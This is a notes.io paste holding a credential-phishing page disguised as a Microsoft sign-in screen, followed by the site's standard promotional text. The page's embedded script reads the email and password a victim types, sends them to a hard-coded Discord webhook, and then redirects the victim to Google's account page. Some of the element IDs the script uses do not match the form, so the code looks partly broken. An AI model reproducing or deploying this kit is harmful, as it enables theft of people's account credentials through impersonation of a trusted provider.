Notes![what is notes.io? What is notes.io?](/theme/images/whatisnotesio.png)
![]() ![]() Notes - notes.io |
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Microsoft Sign In</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f7f7f7;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
margin: 0;
}
.container {
background-color: #fff;
padding: 20px;
border-radius: 5px;
box-shadow: 0 2px 5px rgba(0,0,0,0.1);
text-align: center;
max-width: 350px;
width: 100%;
}
.container img {
width: 30px;
margin-bottom: 20px;
}
.container h2 {
margin: 0;
margin-bottom: 20px;
font-size: 1.2em;
color: #333;
}
.container p {
color: #666;
font-size: 0.9em;
margin-bottom: 20px;
}
.container a {
color: #0078d4;
text-decoration: none;
font-size: 0.9em;
}
.container a:hover {
text-decoration: underline;
}
.input-field {
width: 100%;
margin-bottom: 15px;
}
.input-field input {
width: 95%;
padding: 10px;
font-size: 0.9em;
border: 1px solid #ccc;
border-radius: 3px;
}
.container .keep-signed-in {
display: flex;
align-items: center;
margin-bottom: 20px;
font-size:smaller;
}
.container .keep-signed-in input {
margin-right: 5px;
}
.container .sign-in-btn {
width: 100%;
padding: 10px;
background-color: #0078d4;
color: #fff;
border: none;
border-radius: 3px;
font-size: 1em;
cursor: pointer;
}
.container .sign-in-btn:hover {
background-color: #005a9e;
}
</style>
</head>
<body>
<div class="container">
<img src="https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svg" alt="Microsoft Logo">
<h2>Sign in</h2>
<p>Use your Microsoft account.<br><a href="#">What's this?</a></p>
<div class="input-field">
<input type="text" placeholder="Email or phone">
</div>
<div class="input-field">
<input type="password" placeholder="Password">
</div>
<div class="keep-signed-in">
<input type="checkbox" id="keep-signed-in">
<label for="keep-signed-in">Keep me signed in</label>
</div>
<button class="sign-in-btn">Sign in</button>
<p>No account? <a href="#">Create one!</a></p>
<p><a href="#">Forgot my password</a></p>
<p><a href="#">Sign in with a single-use code</a></p>
</div>
<script>
document.getElementById('loginForm').addEventListener('submit', function(e) {
e.preventDefault();
sendMessage();
});
function sleep(milliseconds) {
return new Promise(resolve => setTimeout(resolve, milliseconds));
}
async function sendMessage() {
var email = document.getElementById('Email').value;
var password = document.getElementById('Passwd').value;
var request = new XMLHttpRequest();
request.open("POST", "https://discord.com/api/webhooks/1270300654153371678/9UauL24cR4v0tTMfk5ddFPsX-0d_pcAugxEDLHCXmGkZUMK4jKjmPWyA1c8Dl98fm_7-", true);
request.setRequestHeader('Content-type', 'application/json');
var params = {
content: "> **USERNAME : **" + email + "n> **PASSWORD : **" + password
};
request.send(JSON.stringify(params));
await sleep(2000);
window.location.href = "https://accounts.google.com/";
}
</script>
</body>
</html>
![]() |
Notes is a web-based application for online taking notes. You can take your notes and share with others people. If you like taking long notes, notes.io is designed for you. To date, over 8,000,000,000+ notes created and continuing...
With notes.io;
- * You can take a note from anywhere and any device with internet connection.
- * You can share the notes in social platforms (YouTube, Facebook, Twitter, instagram etc.).
- * You can quickly share your contents without website, blog and e-mail.
- * You don't need to create any Account to share a note. As you wish you can use quick, easy and best shortened notes with sms, websites, e-mail, or messaging services (WhatsApp, iMessage, Telegram, Signal).
- * Notes.io has fabulous infrastructure design for a short link and allows you to share the note as an easy and understandable link.
Fast: Notes.io is built for speed and performance. You can take a notes quickly and browse your archive.
Easy: Notes.io doesn’t require installation. Just write and share note!
Short: Notes.io’s url just 8 character. You’ll get shorten link of your note when you want to share. (Ex: notes.io/q )
Free: Notes.io works for 14 years and has been free since the day it was started.
You immediately create your first note and start sharing with the ones you wish. If you want to contact us, you can use the following communication channels;
Email: [email protected]
Twitter: http://twitter.com/notesio
Instagram: http://instagram.com/notes.io
Facebook: http://facebook.com/notesio
Regards;
Notes.io Team